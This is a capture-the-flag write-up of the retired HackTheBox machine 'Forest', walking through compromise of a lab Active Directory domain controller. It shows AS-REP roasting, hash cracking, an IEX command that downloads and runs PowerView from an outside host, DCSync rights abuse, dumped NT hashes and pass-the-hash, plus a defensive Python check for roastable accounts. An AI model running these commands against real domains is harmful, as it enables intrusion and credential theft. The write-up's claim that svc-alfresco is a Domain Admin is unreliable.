HackTheBox - Forest
OS | Difficulty | IP Address | Status |
---|---|---|---|
Windows | Easy | 10.10.10.161 | Retired |
This box may be classified as an easy machine, but it takes prior knowledge to solve. It was made by egre55 and mrb3n on HackTheBox. We gain our foothold by enumerating RPC to get usernames, then we AS-REP roast those usernames until we get a Kerberos ticket hash, crack it and log in as that user. For privilege escalation, we abuse Access Control List-based permissions to add a new user, add the new user to a group that lets us obtain the Administrator hash, and then use Pass-The-Hash to log in as Administrator.
Phase 1 - Enumeration
Nmap
As usual, we start phase one with nmap to see which ports are open.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-16 13:35:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h30m42s, deviation: 4h02m30s, median: 10m41s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2021-07-16T06:35:20-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-16T13:35:19
|_ start_date: 2021-07-16T07:07:42
A quick glance at the nmap results tells us right away that this is a Windows machine running Active Directory (Kerberos on 88, LDAP on 389/636 and the global catalog on 3268/3269), which indicates that it is a domain controller. The results also show that the operating system is Windows Server 2016.
RPC
rpcclient -U "" -N 10.10.10.161
rpcclient $> enumdomusers
...
...
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
Through rpcclient, we get a few usernames. One of them, svc-alfresco, is also a Domain Admin, which means that user has higher-level privileges.
Phase 2 - Exploitation
AS-REP Roasting with Impacket
So let’s try Impacket’s GetNPUsers.py to see if we can get a Kerberos hash.
python3 GetNPUsers.py --no-pass -dc-ip 10.10.10.161 htb/svc-alfresco
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:8ae2335d8b1ee8340d19b5577220ba6c$60b28211b189343f297096f45cb5f9fd5e489eeb97873eca43383ed465247259fba7ef471e55bbadbb2659ac590eaf0f15a701e28d74d8f8a15a35770ab9cdfa1b8fb8e66608e5812dfc9068c2bf814df0b9e25f979035a582bdee2e8a5745ef09be73bf2a480b8214b247f33e476da73b385812f3fa21932fbba6bac1bafcc9ccc45cfbf5d7de8c7bd531449ab6984ff3ad01a156932c95970abe9295be6d62a069ce153a3933e7748eda90b737705b993f334463bb374d65ca36054078bdeb94e64aa391bbb2a997c5d
# NOTE: we have intentionally edited the hash above so other HackTheBox players can't copy it and cheat their way to user
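The reason GetNPUsers.py can hand us a hash for an account without knowing its password is that the account has "Do not require Kerberos preauthentication" set in its userAccountControl attribute. As an added example (not part of the original write-up), the Python below decodes that flag from a constructed account export and lists the enabled accounts a defender would want to fix; the LDAP filter constant is the query that returns the same accounts directly from the DC.

```python
from dataclasses import dataclass
from typing import Iterable, List

# userAccountControl bit flags (Microsoft ADS_USER_FLAG values)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000          # "Do not require Kerberos preauthentication"

# LDAP filter an administrator can run against the DC to pull the same set:
# 1.2.840.113556.1.4.803 is the bitwise-AND matching rule, 4194304 == 0x400000
LDAP_FILTER_NO_PREAUTH = (
    "(&(objectCategory=person)(objectClass=user)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
)

@dataclass
class Account:
    sam: str   # sAMAccountName
    uac: int   # userAccountControl

def decode_uac(uac: int) -> List[str]:
    """Names of the flags (from the subset above) set in a userAccountControl value."""
    names = {
        ACCOUNTDISABLE: "ACCOUNTDISABLE",
        NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
        DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
        DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
    }
    return [name for bit, name in names.items() if uac & bit]

def asrep_roastable(accounts: Iterable[Account]) -> List[str]:
    """Enabled accounts that do not require pre-authentication.  The KDC returns
    an AS-REP for these to anyone who asks, and the encrypted part of that reply
    can be cracked offline, which is what GetNPUsers.py collects."""
    return [a.sam for a in accounts
            if a.uac & DONT_REQ_PREAUTH and not a.uac & ACCOUNTDISABLE]

# Constructed sample export; 0x410200 is NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD |
# DONT_REQ_PREAUTH, a service account with pre-authentication switched off.
SAMPLE = [
    Account("sebastien", NORMAL_ACCOUNT),                      # 0x200
    Account("svc-alfresco", 0x410200),
    Account("old-svc", NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_REQ_PREAUTH),
]

if __name__ == "__main__":
    for sam in asrep_roastable(SAMPLE):
        print(f"{sam}: pre-auth not required -> AS-REP roastable, re-enable the flag")
```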
Hash Cracking with Hashcat
Since we got a hash, let’s attempt to crack it.
hashcat -m 18200 svc-alfresco.kerb /usr/share/wordlists/rockyou.txt --force
RESULT: s3rvice
Now that we have a username and password, let’s log in and enumerate the user further to find a way to escalate our privileges.
evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice
Info: Starting Evil-WinRM shell v1.7
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Phase 3 - Privilege Escalation
Using a few different enumeration tools, we learned that the user ‘svc-alfresco’, who is part of Domain Admins, is also part of a special DC group called ‘Account Operators.’ Membership in this group allows its members to create accounts and add them to the ‘Exchange Windows Permissions’ group.
So that is exactly what we are going to do: we’ll use svc-alfresco to create a new account and add that account to the ‘Exchange Windows Permissions’ group.
# we create a new user account
net user potato 'Potato123' /add /domain
# and add the new account to the group
net group "Exchange Windows Permissions" /add potato
ACL-based Escalation
Once our new user is in the Exchange Windows Permissions group, we can abuse that group's WriteDacl right on the domain object with PowerView to grant the newly created user DCSync rights, which let it retrieve the password hashes of other accounts.
# download PowerView into memory with IEX, as it contains the functions we need
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.89:8000/PowerView.ps1')
# store the new account's password as a SecureString
$pass = ConvertTo-SecureString 'Potato123' -AsPlainText -Force
# build a PSCredential object for HTB\potato from that SecureString
$cred = New-Object System.Management.Automation.PSCredential('HTB\potato', $pass)
# if PowerView.ps1 was copied to disk instead, it can also be loaded with Import-Module
Import-Module .\PowerView.ps1
# PowerView function that grants potato DCSync (replication) rights on the domain object
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity potato -Rights DCSync
Once the above has run, we can use Impacket’s secretsdump.py to dump the hashes of all existing users, including the Administrator.
python3 secretsdump.py htb.local/potato:Potato123@10.10.10.161
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
And there we have it: we have the Administrator’s password hash. Let’s log in using pass-the-hash instead of cracking the hash.
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 htb.local/administrator@10.10.10.161
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
htb\administrator
We are now Administrator.